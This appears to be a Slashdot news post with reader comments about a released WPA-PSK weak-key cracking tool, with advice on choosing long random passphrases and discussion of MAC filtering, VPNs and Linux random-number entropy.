WPA Weak Key Cracker Posted 168
Glenn Fleishman writes "The folks at TinyPEAP released a cracking tool to break Wi-Fi Protected Access (WPA) keys. WPA is the replacement for weak WEP keys in the original 802.11b specification. Robert Moskowitz of ICSA Labs released a paper almost exactly a year ago documenting how WPA keys that were short and lacked randomnness could be subject to cracks. This tool automates the process. Moskowitz advised choosing passphrases of more than 20 characters or generating random keys of at least 96 bits, but preferably 128 bits. Some tools exist to produce better keys, including chipmaker Broadcom's SecureEZSetup (in selected hardware) and Buffalo Technologies' hardware-based AOSS for automatic key generation and propagation. Enterprise-based WPA with 802.1X doesn't have this weakness: each user gets a long WPA key that's randomly generated and uniquely assigned--and can be frequently changed during a session."
So it's just a bruteforce/dictionary tool... (Score:2, Informative)
Re:What Morons (Score:2, Informative)
Re:By its nature... (Score:0, Informative)
Re:What Morons (Score:2, Informative)
Re:Odds of implementation? (Score:3, Informative)
Er, you mean WPA?
Re:What Morons (Score:4, Informative)
_YOUR_ wlan card may have the MAC address burned into it. Once ALL NIC did. I think it was more than 10 years ago that I saw my first NIC that DID NOT HAVE a MAC address (it was all zeroes, and expected to be set in software).
_MY_ wlan card will _CERTAINLY_ let me change the MAC address - under Linux _or_ Windows.
http://www.theboyz.biz/ [theboyz.biz]Computers, parts, electronics, small appliances and more!
Re:don't blame WPA (Score:3, Informative)
Here's the a correct link [gentoo.org]
Re:WPA Keys (Score:3, Informative)
Do your homework. Look up Supplicant, XSupplication, HostAP, 802.11i for Linux, 802.1x for Linux, etc, etc, etc... Lots of things going on.
ITMT... This crack is only for weak keys with WPA-PSK. Not applicable to WPA enterprise or WPA2.
Re:What Morons (Score:4, Informative)
No, you don't have to do this. Once the WEP key is broken (or if there is no WEP key, just MAC filtering), you simply listen to the traffic to get a MAC address that's allowed, and use that.
Regards,
--
*Art
Re:So it's just a bruteforce/dictionary tool... (Score:3, Informative)
Just name all your specific MAC addresses (Score:2, Informative)
How many home networks really need to allow random MAC addresses access?
Re:By its nature... (Score:1, Informative)
and im fairly certian it won't be compromised any time in the near future
--kingpunk
Re:By its nature... (Score:5, Informative)
Re:Suggestion (Score:3, Informative)
Of course if someone spends that much effort just to break into your wireless network you either have something really important or they are have way to much time on their hands. (and I doubt if anyone has anything that important on their network....)
Re:What Morons (Score:4, Informative)
It's just that they cannot be authenticated in any way. It's like allowing only people who claim to be you on your network, rather than people who can prove it in some way.
Re:What Morons (Score:2, Informative)
WPA er Old News! (Score:3, Informative)
Re:Ho hum (Score:3, Informative)
Note that WPA is just like WEP but with quickly rotating keys and more secure key exchange. Yeah, you can't crack it in real-time to get on the network... but if you listen to the vendors carefully, they'll even say it... "Authentication, Authorization.... " But never will they formally say "Secure encryption of data"
You can decode everything but the key exchange off-line.
VPN software is the only way to go. The wireless vendors are liars.
Does anyone want to comment on WPA2? Does it require new hardware?
Re:By its nature... (Score:2, Informative)
Maybe you are talking about a specific implementation here (Linux I bet) and detaisl are sightly different between different unix like systems...
The basic issue is that as soon as you think up a process that generates numbers in a way that you can describe mathematically, you also end up with a process uncapable of generating real randomness.
You can get most aspects of randomness, but what you won't get, and that is the most important part for encryption, is unpredictability.
How predictable things are depends for a bit on the algorithm that you use, and for a large part on the abbility to deduct the current state of the 'random generator'. If those 2 are known, the next number your random generator will produce can also be known.
This is why it is so important to have a good entropy source, it makes it virtually impossible to guess at the state of the generator.
Re:By its nature... (Score:3, Informative)
On Linux, that's wrong.
You're correct about everything else, though. The only thing you didn't know is that
> This is why it is so important to have a good entropy source, it makes it
> virtually impossible to guess at the state of the generator.
Now you're talking. That's why Linux uses the low bits of the CPU's clock cycle counter sampled during interrupts (which are generated by disks, the network, keyboards, and mice, etc. i.e. fairly unpredictable things, esp. wrt. exact numbers of CPU cycles!) It mixes these samples into its pool with cryptographically strong algorithms (insert hand-waving here...
If you're totally paranoid, RML's netdev-random patch will let you choose whether you want to add entropy from network interrupts to the entropy pool. Of course, you could also use rngd from rng-tools to feed entropy from your chipset's built-in rng (which measure thermal noise, and so has randomness that fairly directly from quantum mechanical processes, the only known source of true unpredictability in the Universe.)